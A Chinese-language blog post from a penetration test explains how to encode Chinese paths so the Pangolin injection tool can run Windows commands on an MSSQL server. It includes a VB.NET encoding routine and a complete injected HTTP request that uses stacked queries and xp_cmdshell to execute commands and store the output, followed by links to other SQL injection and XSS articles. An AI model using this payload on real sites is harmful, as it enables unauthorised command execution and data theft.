MSSQL注入时对中文字符的处理方法

最新推荐文章于 2022-05-30 10:07:08 发布
最新推荐文章于 2022-05-30 10:07:08 发布
阅读量2k 收藏
点赞数
分类专栏: Visual Basic 使用技巧 WEB应用程序安全 文章标签: textbox button express table string 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/langkew/article/details/7888242
版权

在一次渗透测试过程中发现对方的网站根目录用的是中文,使用Pangolin测试时,发现类似“dir c:\中文路径”这种cmd命令执行总是出错,后来用BurpSuite对发送的数据包进行分析,发现Pangolin使用了一种类似URLEncode的编码方式对中文进行编码。

如“中文路径”被其编码成为:

0xd600d000ce00c400c200b700be00b600

很明显,这里每个中文字符被拆分成了两个双字节且均以00结尾,不符合Unicode的规则,如果是Unicode编码的话,每个中文应当占用2个字节,不应有00出现。

看来Pangolin对中文的处理有问题,不过我没办法修改它的二进制代码,只能自己做一个编码程序,然后配合BurpSuite把渗透测试工作执行下去。下面是处理编码的一个小程序中的核心代码,在Visual Basic 2010 Express Edition编译通过。

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim strOut As String = ""
        For i = 1 To Len(TextBox1.Text)  '逐个遍历传入的字符
            Dim strChar As String = ""
            strChar = Hex(AscW(Mid(TextBox1.Text, i, 1)))  '将当前字符转为16进制表示的Unicode编码
            If Len(strChar) = 2 Then     '如果是ASCII字符,在其后加上00
                strChar = strChar + "00"
            Else
                strChar = Mid(strChar, 3, 2) + Mid(strChar, 1, 2)   '将该编码高低位互换(否则MSSQL解析错误)
            End If
            strOut = strOut + strChar
        Next
        TextBox2.Text = "0x" + strOut.ToLower
End Sub

使用该程序对汉字“中文路径”进行编码后,结果如下:

0x2d4e8765ef8d845f
 

在Pangolin中设置BurpSuite代理,使用BurpSuite把Pangolin发送的数据包中@z=??的问号部分替换为自己计算的字符编码即可得到想要的结果。

GET /news_detail.aspx?newsid=3941%20;declare%20@z%20nvarchar(4000)%20set%20@z=??%20insert%20into%20[pangolin_test_table](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[pangolin_test_table]%20add%20id%20int%20not%20null%20identity%20(1,1)-- HTTP/1.1

注入过程中的中文处理方法
asli33的专栏
02-15 402
中文处理方法    在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解,“中文恐惧症”很快可以克服。    先说一点常识:    Access中,中文的ASCII码可能会出现负数,取出该负数后用abs()取绝对值,汉字字符不变。    SQL Server中,中文的ASCII为正数,但由于是UNICODE的双位编码,不能
SQL注入步骤和常用函数以及中文处理方法
11-08 2539
第一节、SQL注入的一般步骤  首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。    其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:    (A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:  Select * from 表名 where 字段=49  注入的参数为ID=49 And [查询条件],即是生成语句:  Sele
MS-SQLInsert操作插入的中文变成问号"???"的解决办法
热门推荐
xwdreamer的专栏
05-20 1万+
      编写的新闻管理系统添加新闻以后标题和内容都变成了"???",插入语句如下:insert into news_info(info_title,info_content) values(标题,内容)       在网上查了一下,这是因为我的标题和内容的数据类型分别为nvarchar和ntext,而我的数据库排序规则是"SQL_Latin1_General_CP1_CI_
SQLMAP 注射工具中文使用用法
xysoul的专栏
04-13 1656
sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。 有许多其它SQL 射入工具在网, 但我不能发现任何人适合所有我的需要因此我感到需要在我的渗透测试期间给成功地写我自己的工具测试, 辨认和利用网应用的
简单介绍下常用SQL注入函数和中文处理方法
三朝看客
07-18 708
一、常用SQL注入函数 有SQL语言基础的人,在SQL注入候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。 Access:asc(字符) SQLServer:unicode(字符) 作用:返回某字符的ASCII码 Access:chr(数字) SQLServer:nchar(数字) 作用:与asc相反,根据ASCII码返回字符 Access:mi...
一次另类的mssql手注+写脚本(windows通过for循环来定位文件绝对路径;通过将路径写到表中来读取数据;通过unicode编码来读取中文)
weixin_50464560的博客
05-10 830
转载https://xz.aliyun.com/t/11303?share_token=3d150dd5-438d-4bc1-943b-9b4916e7512f 0x00 前言 事情的起因是一位老哥叫我帮他打一个站点,于是就有了这篇文章 0x01 总体思路 发现mssql注入->上cs->失败 通过mssql注入->拿数据->解密失败->进后台无望 最终想到了: xp_cmdshell->通过cmd中for循环找网站绝对路径->通过
MySQL数据入库特殊字符处理详解
09-10
MySQL数据库在处理数据入库,特殊字符的管理是至关重要的,因为这些字符可能会影响查询的执行和数据的存储。本文主要探讨了如何在MySQL处理这些特殊字符,确保数据的正确性和完整性。 首先,MySQL支持转义字符...
Python处理mysql特殊字符的问题
09-08
在Python中与MySQL数据库交互,经常会遇到处理特殊字符的问题,这些特殊字符可能会影响SQL查询语句的正确性。本文将详细讨论如何处理这些问题,并提供一些实用的解决方案。 首先,当我们使用字符串格式化方法(如...
在C#和MySQL中存取中文字符避免乱码的方法
09-10
在C#和MySQL处理中文字符,避免乱码的关键在于正确地编码和解码。中文字符由于其多字节的特性,在传输和存储如果不按照Unicode标准进行处理,很容易出现乱码问题。本文将详细讲解如何在C#应用程序中与MySQL...
Mysql字符处理函数详细介绍、总结
12-15
MySQL中的字符处理函数是数据库操作中非常重要的工具,它们允许我们对存储的数据进行各种操作,如拼接、截取、转换、查找等。以下是对这些函数的详细解释: 1. ASCII(char):此函数返回字符的ASCII码值,即字符...
MySQL解决SQL注入的另类方法详解
09-10
在MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要探讨一些非传统的、另类的方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中,...
SQL Server中插入中文变成(问号)(乱码)
oljisfcy的博客
05-30 1万+
英文版的SQL Server中直接在SQL语句中插入中文最终会显示??,可在字符串前加'N'临解决,也可更改数据库的默认语言一次解决。
mysql盲注ascii中文_[翻译]关于通过对8bit的ascii做右位移提高mysql盲注效率
weixin_35698738的博客
02-02 157
该楼层疑似违规已被系统折叠隐藏此楼查看此楼通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位下面将以查询mysql数据库当中user()的第一位为例:ps:第二位,第三位依次类推select substr(user(),2,1) mysql> select substr(user(),3,1)首先执行如下sql语句:mysql> select (ascii((su...
pangolin安装
Eminbogen的博客
01-21 4819
按照视觉SLAM14讲安装这个库,但是出现了问题,最后选择了这种方法。 下载地址:https://github.com/stevenlovegrove/Pangolin 之后变化一点的cmake一套。 mkdir build cd build cmake -DCPP11_NO_BOOST=1 .. make ...
python实现mysql的单引号字符串过滤方法
09-10
在Python编程中,与MySQL数据库交互,我们经常需要处理包含特殊字符字符串,特别是当这些字符串用于构建SQL查询语句。单引号(')是一个常见的特殊字符,如果在字符串中直接使用,可能会导致SQL注入攻击或者...
编译Pangolin的make过程,报错display_wayland.cpp中'pointer_handle_frame' was not declared in this scope,解决方法
liuhang's blog
06-06 810
首先,再次感谢天大 王同学的耐心帮助~想在自己跑一下ORB-SLAM试试,在配置环境编译Pangolin的make过程,报错display_wayland.cpp中'pointer_handle_frame''was  not declared in this scope, --------------------------------------------------------------...
【漏洞挖掘】——27、XSS漏洞攻防案例
Fly_鹏程万里
03-10 8501
本实验在搜索功能中包含一个简单的跨站点脚本漏洞,为了解决这个实验,您必须执行一个调用alert函数的跨站点脚本攻击本实验在搜索博客功能中包含一个反射型的跨站点脚本漏洞,其中尖括号是HTML编码的,为了解决这个实验,你需要执行一个跨站点脚本攻击,注入一个属性并调用alert函数本实验包含一个反射性跨站点脚本漏洞,该漏洞存在于编码了尖括号的搜索查询跟踪功能中,反射发生在JavaScript字符串内部,为了解决这个实验,你需要执行一个跨站点脚本攻击,它突破JavaScript字符串并调用alert函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值